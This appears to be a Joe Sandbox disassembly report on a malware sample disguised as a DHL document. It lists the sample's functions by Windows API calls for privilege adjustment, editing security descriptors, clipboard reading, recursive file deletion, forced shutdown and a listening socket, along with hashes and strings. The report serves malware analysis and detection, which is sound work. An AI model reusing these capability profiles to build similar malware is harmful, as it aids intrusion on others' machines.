GetProcessWindowStation.USER32 ref: 004512EA
SetProcessWindowStation.USER32(00000000), ref: 004512F4
OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 00451310

Part of subcall function 004510BF: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,004511FC), ref: 004510D4
Part of subcall function 004510BF: CloseHandle.KERNEL32(?,?,004511FC), ref: 004510E9

Strings

winsta0, xrefs: 004512CC
ZK, xrefs: 00451392
default, xrefs: 0045130B
, xrefs: 0045125A

Memory Dump Source

Source File: 00000000.00000002.1267738006.00000000003F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003F0000, based on PE: true

Associated: 00000000.00000002.1267721473.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267840670.00000000004BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267861882.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3f0000_DHL-DOC83972025-1.jbxd

Similarity

API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLogonLookupPrivilegeUserValue
String ID: $default$winsta0$ZK
API String ID: 22674027-314871684
Opcode ID: db40ea19737df9e89ca149adf08ed4808126ec425e425e3b72296e0707b697cd
Instruction ID: bd90cc5168fff163f2adba40d72f418b147b3928d9fe2f49864f36465760e3c2
Opcode Fuzzy Hash: db40ea19737df9e89ca149adf08ed4808126ec425e425e3b72296e0707b697cd
Instruction Fuzzy Hash: A5818071900209ABDF119FA4DC89FEF7BB9EF05705F14412AFD10B62A1D7788949CB68

Function 00450B62 Relevance: 31.7, APIs: 21, Instructions: 202memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 004510F9: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00451114
Part of subcall function 004510F9: GetLastError.KERNEL32(?,00000000,00000000,?,?,00450B9B,?,?,?), ref: 00451120
Part of subcall function 004510F9: GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,00450B9B,?,?,?), ref: 0045112F
Part of subcall function 004510F9: HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,00450B9B,?,?,?), ref: 00451136
Part of subcall function 004510F9: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 0045114D

GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00450BCC
GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00450C00
GetLengthSid.ADVAPI32(?), ref: 00450C17
GetAce.ADVAPI32(?,00000000,?), ref: 00450C51
AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00450C6D
GetLengthSid.ADVAPI32(?), ref: 00450C84
GetProcessHeap.KERNEL32(00000008,00000008), ref: 00450C8C
HeapAlloc.KERNEL32(00000000), ref: 00450C93
GetLengthSid.ADVAPI32(?,00000008,?), ref: 00450CB4
CopySid.ADVAPI32(00000000), ref: 00450CBB
AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00450CEA
SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00450D0C
SetUserObjectSecurity.USER32(?,00000004,?), ref: 00450D1E
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00450D45
HeapFree.KERNEL32(00000000), ref: 00450D4C
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00450D55
HeapFree.KERNEL32(00000000), ref: 00450D5C
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00450D65
HeapFree.KERNEL32(00000000), ref: 00450D6C
GetProcessHeap.KERNEL32(00000000,?), ref: 00450D78
HeapFree.KERNEL32(00000000), ref: 00450D7F

Part of subcall function 00451193: GetProcessHeap.KERNEL32(00000008,00450BB1,?,00000000,?,00450BB1,?), ref: 004511A1
Part of subcall function 00451193: HeapAlloc.KERNEL32(00000000,?,00000000,?,00450BB1,?), ref: 004511A8
Part of subcall function 00451193: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00000000,?,00450BB1,?), ref: 004511B7

Memory Dump Source

Source File: 00000000.00000002.1267738006.00000000003F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003F0000, based on PE: true

Associated: 00000000.00000002.1267721473.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267840670.00000000004BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267861882.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3f0000_DHL-DOC83972025-1.jbxd

Similarity

API ID: Heap$Process$Security$Free$AllocDescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
String ID:
API String ID: 4175595110-0
Opcode ID: 043f2300b61087703898eb2f9bbeef0440c6b14ca8897de4f35b984961cd45e5
Instruction ID: 073291be1dafe2583aeb4b706fc6174b64cce2e4df479bbc91933e632a99602a
Opcode Fuzzy Hash: 043f2300b61087703898eb2f9bbeef0440c6b14ca8897de4f35b984961cd45e5
Instruction Fuzzy Hash: 9B716E7590020AABDF109FE4DC84FEFBBB8BF05341F14452AED14A6292D779A909CB74

Function 0046EAFF Relevance: 30.2, APIs: 20, Instructions: 191clipboardfileCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32(0048CC08), ref: 0046EB29
IsClipboardFormatAvailable.USER32(0000000D), ref: 0046EB37
GetClipboardData.USER32(0000000D), ref: 0046EB43
CloseClipboard.USER32 ref: 0046EB4F
GlobalLock.KERNEL32(00000000), ref: 0046EB87
CloseClipboard.USER32 ref: 0046EB91
GlobalUnlock.KERNEL32(00000000), ref: 0046EBBC
IsClipboardFormatAvailable.USER32(00000001), ref: 0046EBC9
GetClipboardData.USER32(00000001), ref: 0046EBD1
GlobalLock.KERNEL32(00000000), ref: 0046EBE2
GlobalUnlock.KERNEL32(00000000), ref: 0046EC22
IsClipboardFormatAvailable.USER32(0000000F), ref: 0046EC38
GetClipboardData.USER32(0000000F), ref: 0046EC44
GlobalLock.KERNEL32(00000000), ref: 0046EC55
DragQueryFileW.SHELL32(00000000,000000FF,00000000,00000000), ref: 0046EC77
DragQueryFileW.SHELL32(00000000,?,?,00000104), ref: 0046EC94
DragQueryFileW.SHELL32(00000000,?,?,00000104), ref: 0046ECD2
GlobalUnlock.KERNEL32(00000000), ref: 0046ECF3
CountClipboardFormats.USER32 ref: 0046ED14
CloseClipboard.USER32 ref: 0046ED59

Memory Dump Source

Source File: 00000000.00000002.1267738006.00000000003F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003F0000, based on PE: true

Associated: 00000000.00000002.1267721473.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267840670.00000000004BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267861882.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3f0000_DHL-DOC83972025-1.jbxd

Similarity

API ID: Clipboard$Global$AvailableCloseDataDragFileFormatLockQueryUnlock$CountFormatsOpen
String ID:
API String ID: 420908878-0
Opcode ID: dae771855832b2eaa9a3583124490b6b30cd2ed757b157a1e5655d8ed22d9b48
Instruction ID: 0684fe9e9a54b24bb3d0b691779ee7251aaa38a0ec38b171573f140777eff25d
Opcode Fuzzy Hash: dae771855832b2eaa9a3583124490b6b30cd2ed757b157a1e5655d8ed22d9b48
Instruction Fuzzy Hash: C661E038204206AFD301EF21D884F3E77E4AF84744F14486EF5469B2A2EB35ED46CB66

Function 0046698F Relevance: 21.4, APIs: 7, Strings: 5, Instructions: 363timefileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?), ref: 004669BE
FindClose.KERNEL32(00000000), ref: 00466A12
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00466A4E
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00466A75

Part of subcall function 003F9CB3: _wcslen.LIBCMT ref: 003F9CBD

FileTimeToSystemTime.KERNEL32(?,?), ref: 00466AB2
FileTimeToSystemTime.KERNEL32(?,?), ref: 00466ADF

Strings

%4d, xrefs: 00466BB1
%03d, xrefs: 00466DA2
%4d%02d%02d%02d%02d%02d, xrefs: 00466B6A
%02d, xrefs: 00466C00, 00466C0A, 00466C5A, 00466CAA, 00466CFA, 00466D4A
%4d%02d%02d%02d%02d%02d%03d, xrefs: 00466B32

Memory Dump Source

Source File: 00000000.00000002.1267738006.00000000003F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003F0000, based on PE: true

Associated: 00000000.00000002.1267721473.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267840670.00000000004BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267861882.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3f0000_DHL-DOC83972025-1.jbxd

Similarity

API ID: Time$File$FindLocalSystem$CloseFirst_wcslen
String ID: %02d$%03d$%4d$%4d%02d%02d%02d%02d%02d$%4d%02d%02d%02d%02d%02d%03d
API String ID: 3830820486-3289030164
Opcode ID: c91207828371557b08eea56b8c737ef8825e2202f4f502367c75ed1054456a66
Instruction ID: bba600e9add7e16b1fd8e4686386a8a29d899c4e05b35af22a86b3cd2da9979b
Opcode Fuzzy Hash: c91207828371557b08eea56b8c737ef8825e2202f4f502367c75ed1054456a66
Instruction Fuzzy Hash: 7CD15271508304AFC711EBA4C995EBFB7ECAF88704F04491EF685D6291EB78DA44CB62

Function 00469642 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 118fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?,771A8FB0,?,00000000), ref: 00469663
GetFileAttributesW.KERNEL32(?), ref: 004696A1
SetFileAttributesW.KERNEL32(?,?), ref: 004696BB
FindNextFileW.KERNEL32(00000000,?), ref: 004696D3
FindClose.KERNEL32(00000000), ref: 004696DE
FindFirstFileW.KERNEL32(*.*,?), ref: 004696FA
SetCurrentDirectoryW.KERNEL32(?), ref: 0046974A
SetCurrentDirectoryW.KERNEL32(004B6B7C), ref: 00469768
FindNextFileW.KERNEL32(00000000,00000010), ref: 00469772
FindClose.KERNEL32(00000000), ref: 0046977F
FindClose.KERNEL32(00000000), ref: 0046978F

Strings

*.*, xrefs: 004696F5

Memory Dump Source

Source File: 00000000.00000002.1267738006.00000000003F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003F0000, based on PE: true

Associated: 00000000.00000002.1267721473.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267840670.00000000004BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267861882.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3f0000_DHL-DOC83972025-1.jbxd

Similarity

API ID: Find$File$Close$AttributesCurrentDirectoryFirstNext
String ID: *.*
API String ID: 1409584000-438819550
Opcode ID: 17ea7cf86a05b511cce8368dcbbb00d687e531836ae481451436fdafd66a5913
Instruction ID: 7fe6b5ed52448be8fe6326f01f411f5e07291da937c7bea5d27ea174840358f3
Opcode Fuzzy Hash: 17ea7cf86a05b511cce8368dcbbb00d687e531836ae481451436fdafd66a5913
Instruction Fuzzy Hash: 2D31C532500219AADF14AFB4DC48AEF77AC9F49321F1045ABF805E2190EB78DD448F2D

Function 0046979D Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 111fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?,771A8FB0,?,00000000), ref: 004697BE
FindNextFileW.KERNEL32(00000000,?), ref: 00469819
FindClose.KERNEL32(00000000), ref: 00469824
FindFirstFileW.KERNEL32(*.*,?), ref: 00469840
SetCurrentDirectoryW.KERNEL32(?), ref: 00469890
SetCurrentDirectoryW.KERNEL32(004B6B7C), ref: 004698AE
FindNextFileW.KERNEL32(00000000,00000010), ref: 004698B8
FindClose.KERNEL32(00000000), ref: 004698C5
FindClose.KERNEL32(00000000), ref: 004698D5

Part of subcall function 0045DAE5: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 0045DB00

Strings

*.*, xrefs: 0046983B

Memory Dump Source

Source File: 00000000.00000002.1267738006.00000000003F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003F0000, based on PE: true

Associated: 00000000.00000002.1267721473.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267840670.00000000004BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267861882.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3f0000_DHL-DOC83972025-1.jbxd

Similarity

API ID: Find$File$Close$CurrentDirectoryFirstNext$Create
String ID: *.*
API String ID: 2640511053-438819550
Opcode ID: 3a2714aec42666de0049f63ba8102555422203971584de527f71cb83a0ffb4e8
Instruction ID: 85cb781c52fcea0d495235fcb5a3e89966cc2c3acec5e091c4662929bd4dd289
Opcode Fuzzy Hash: 3a2714aec42666de0049f63ba8102555422203971584de527f71cb83a0ffb4e8
Instruction Fuzzy Hash: 0B31C532500219AADB10BFB5EC48ADF77AC9F46324F1445ABE810A31D0EB78DD85CB6D

Function 00468195 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 186timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32(?), ref: 00468257
SystemTimeToFileTime.KERNEL32(?,?), ref: 00468267
LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00468273
GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00468310
SetCurrentDirectoryW.KERNEL32(?), ref: 00468324
SetCurrentDirectoryW.KERNEL32(?), ref: 00468356
SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 0046838C
SetCurrentDirectoryW.KERNEL32(?), ref: 00468395

Strings

*.*, xrefs: 0046839B

Memory Dump Source

Source File: 00000000.00000002.1267738006.00000000003F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003F0000, based on PE: true

Associated: 00000000.00000002.1267721473.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267840670.00000000004BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267861882.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3f0000_DHL-DOC83972025-1.jbxd

Similarity

API ID: CurrentDirectoryTime$File$Local$System
String ID: *.*
API String ID: 1464919966-438819550
Opcode ID: 334648b0c3e877e6284be7ece79e463045a82e86158272a972a6550ac24e5f63
Instruction ID: 580c564203e25b3d38197bda0a6cf15bfac57c5bce2014f552f7f62c801850e5
Opcode Fuzzy Hash: 334648b0c3e877e6284be7ece79e463045a82e86158272a972a6550ac24e5f63
Instruction Fuzzy Hash: 0D615CB25043499FCB10EF60C8509AFB3E8FF89314F04496EF98997251EB39E945CB96

Function 0045D076 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 172fileCOMMON

Download Yara Rule

APIs

Part of subcall function 003F3AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,003F3A97,?,?,003F2E7F,?,?,?,00000000), ref: 003F3AC2

Part of subcall function 0045E199: GetFileAttributesW.KERNEL32(?,0045CF95), ref: 0045E19A

FindFirstFileW.KERNEL32(?,?), ref: 0045D122
DeleteFileW.KERNEL32(?,?,?,?,?,00000000,?,?,?), ref: 0045D1DD
MoveFileW.KERNEL32(?,?), ref: 0045D1F0
DeleteFileW.KERNEL32(?,?,?,?), ref: 0045D20D
FindNextFileW.KERNEL32(00000000,00000010), ref: 0045D237

Part of subcall function 0045D29C: CopyFileExW.KERNEL32(?,?,00000000,00000000,00000000,00000008,?,?,0045D21C,?,?), ref: 0045D2B2

FindClose.KERNEL32(00000000,?,?,?), ref: 0045D253
FindClose.KERNEL32(00000000), ref: 0045D264

Strings

\*.*, xrefs: 0045D0CD, 0045D0D6, 0045D0EB

Memory Dump Source

Source File: 00000000.00000002.1267738006.00000000003F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003F0000, based on PE: true

Associated: 00000000.00000002.1267721473.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267840670.00000000004BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267861882.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3f0000_DHL-DOC83972025-1.jbxd

Similarity

API ID: File$Find$CloseDelete$AttributesCopyFirstFullMoveNameNextPath
String ID: \*.*
API String ID: 1946585618-1173974218
Opcode ID: d8ae7500cd4c641cb7c8e43e6f632a82a6bb58d63920b2d4fb272f9e188c4e32
Instruction ID: a7c9c34f7002463335195d8d3a90de3284d034a3137ab6b2e17d23735afa76f2
Opcode Fuzzy Hash: d8ae7500cd4c641cb7c8e43e6f632a82a6bb58d63920b2d4fb272f9e188c4e32
Instruction Fuzzy Hash: 52617131C0110D9ACF16EBE1DA92AFEB7B5AF15341F2041AAE90177292EB345F0DCB65

Function 0046ED6A Relevance: 13.6, APIs: 9, Instructions: 102clipboardmemoryCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32 ref: 0046ED91
EmptyClipboard.USER32 ref: 0046ED97
GlobalAlloc.KERNEL32(00000002,?), ref: 0046EDAC
CloseClipboard.USER32 ref: 0046EEA3

Memory Dump Source

Source File: 00000000.00000002.1267738006.00000000003F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003F0000, based on PE: true

Associated: 00000000.00000002.1267721473.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267840670.00000000004BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267861882.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3f0000_DHL-DOC83972025-1.jbxd

Similarity

API ID: Clipboard$AllocCloseEmptyGlobalOpen
String ID:
API String ID: 1737998785-0
Opcode ID: 6af8a6af3dafccd5ca04f38202dd9999767cd4289a2844c919f69a5ddeda336d
Instruction ID: e6a54b33e787f372e2cb1b64593f0cfe80895025e0ed091e825c0dbad0e58e01
Opcode Fuzzy Hash: 6af8a6af3dafccd5ca04f38202dd9999767cd4289a2844c919f69a5ddeda336d
Instruction Fuzzy Hash: 7841A0356046119FE310CF16D888F1ABBE1EF44318F14C4AEE4158B762D73AEC42CB95

Function 0045E8F6 Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 57shutdownCOMMON

Download Yara Rule

APIs

Part of subcall function 004516C3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0045170D
Part of subcall function 004516C3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 0045173A
Part of subcall function 004516C3: GetLastError.KERNEL32 ref: 0045174A

ExitWindowsEx.USER32(?,00000000), ref: 0045E932

Strings

, xrefs: 0045E95C
, xrefs: 0045E920
@, xrefs: 0045E925
SeShutdownPrivilege, xrefs: 0045E902

Memory Dump Source

Source File: 00000000.00000002.1267738006.00000000003F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003F0000, based on PE: true

Associated: 00000000.00000002.1267721473.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267840670.00000000004BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267861882.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3f0000_DHL-DOC83972025-1.jbxd

Similarity

API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
String ID: $ $@$SeShutdownPrivilege
API String ID: 2234035333-3163812486
Opcode ID: 8644926976658be5dfa38ae75ccf324f0ffe35feb6db14f092ec66c74371ed81
Instruction ID: 311e2eccae07cfcdfa21d9a18e121fdb29cf93231e140cfba40e8c7a28c5d6e0
Opcode Fuzzy Hash: 8644926976658be5dfa38ae75ccf324f0ffe35feb6db14f092ec66c74371ed81
Instruction Fuzzy Hash: DF012BB2A10210ABEB1826B6AC86FBF725C9B14746F150827FC03E21D3D56C5D4882AD

Function 00471204 Relevance: 12.1, APIs: 8, Instructions: 113networkCOMMON

Download Yara Rule

APIs

socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 00471276
WSAGetLastError.WSOCK32 ref: 00471283
bind.WSOCK32(00000000,?,00000010), ref: 004712BA
WSAGetLastError.WSOCK32 ref: 004712C5
closesocket.WSOCK32(00000000), ref: 004712F4
listen.WSOCK32(00000000,00000005), ref: 00471303
WSAGetLastError.WSOCK32 ref: 0047130D
closesocket.WSOCK32(00000000), ref: 0047133C

Memory Dump Source

Source File: 00000000.00000002.1267738006.00000000003F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003F0000, based on PE: true

Associated: 00000000.00000002.1267721473.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267840670.00000000004BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267861882.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3f0000_DHL-DOC83972025-1.jbxd

Similarity

API ID: ErrorLast$closesocket$bindlistensocket
String ID:
API String ID: 540024437-0
Opcode ID: ede64d9b52b68932799c62977b819e9ccff8421f6e6efefeac6eef0e356a10ec
Instruction ID: 08511185c3c24f917a5c46d1d8d21d171e02cd84c3081258841127ac7bce5a57
Opcode Fuzzy Hash: ede64d9b52b68932799c62977b819e9ccff8421f6e6efefeac6eef0e356a10ec
Instruction Fuzzy Hash: 6D417F316001009FD710EF68C488B6ABBE5AF46318F18C599D95A9F3A3C775ED81CBA5

Function 0042B952 Relevance: 10.9, APIs: 7, Instructions: 370timeCOMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 0042B9D4
_free.LIBCMT ref: 0042B9F8
_free.LIBCMT ref: 0042BB7F
GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,00493700), ref: 0042BB91
WideCharToMultiByte.KERNEL32(00000000,00000000,004C121C,000000FF,00000000,0000003F,00000000,?,?), ref: 0042BC09
WideCharToMultiByte.KERNEL32(00000000,00000000,004C1270,000000FF,?,0000003F,00000000,?), ref: 0042BC36
_free.LIBCMT ref: 0042BD4B

Memory Dump Source

Source File: 00000000.00000002.1267738006.00000000003F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003F0000, based on PE: true

Associated: 00000000.00000002.1267721473.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267840670.00000000004BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267861882.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3f0000_DHL-DOC83972025-1.jbxd

Similarity

API ID: _free$ByteCharMultiWide$InformationTimeZone
String ID:
API String ID: 314583886-0
Opcode ID: 473204ac7f15dd0dd1637e2277fbda76a98e3a7f898ccbb92daf3d806106cfb0
Instruction ID: 3f6e6b92a7881fe1a82779962908de6945eaf78dcd7ade399a6637891a3d3af4
Opcode Fuzzy Hash: 473204ac7f15dd0dd1637e2277fbda76a98e3a7f898ccbb92daf3d806106cfb0
Instruction Fuzzy Hash: 56C12975B04225AFCB10DF69AC41BAA7BB8EF46310F9441AFE890D7352D7389D4187D8

Function 0045D3A9 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 91fileCOMMON

Download Yara Rule

APIs

Part of subcall function 003F3AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,003F3A97,?,?,003F2E7F,?,?,?,00000000), ref: 003F3AC2

Part of subcall function 0045E199: GetFileAttributesW.KERNEL32(?,0045CF95), ref: 0045E19A

FindFirstFileW.KERNEL32(?,?), ref: 0045D420
DeleteFileW.KERNEL32(?,?,?,?), ref: 0045D470
FindNextFileW.KERNEL32(00000000,00000010), ref: 0045D481
FindClose.KERNEL32(00000000), ref: 0045D498
FindClose.KERNEL32(00000000), ref: 0045D4A1

Strings

\*.*, xrefs: 0045D3F2

Memory Dump Source

Source File: 00000000.00000002.1267738006.00000000003F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003F0000, based on PE: true

Associated: 00000000.00000002.1267721473.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267840670.00000000004BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267861882.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3f0000_DHL-DOC83972025-1.jbxd

Similarity

API ID: FileFind$Close$AttributesDeleteFirstFullNameNextPath
String ID: \*.*
API String ID: 2649000838-1173974218
Opcode ID: a17fa556694dfe5b181d5a3ac00b8de5a912b5545773387462bfa6d375d1a96c
Instruction ID: 6bcb26ea9e01d77ca04ac6416d81e0e7f8349eb86078c3c1d2d15145ad5e39f4
Opcode Fuzzy Hash: a17fa556694dfe5b181d5a3ac00b8de5a912b5545773387462bfa6d375d1a96c
Instruction Fuzzy Hash: 7C31A4714083499BC311EF64C8919BF77E8AE92301F404E2EF9D557192EB34AA0DC767

Function 0042E4FF Relevance: 10.1, APIs: 1, Strings: 4, Instructions: 1381COMMON

Download Yara Rule

APIs

__floor_pentium4.LIBCMT ref: 0042E645

Strings

1#QNAN, xrefs: 0042F84B
1#IND, xrefs: 0042F83D
1#INF, xrefs: 0042F852
1#SNAN, xrefs: 0042F844

Memory Dump Source

Source File: 00000000.00000002.1267738006.00000000003F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003F0000, based on PE: true

Associated: 00000000.00000002.1267721473.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267840670.00000000004BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267861882.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3f0000_DHL-DOC83972025-1.jbxd

Similarity

API ID: __floor_pentium4
String ID: 1#IND$1#INF$1#QNAN$1#SNAN
API String ID: 4168288129-2761157908
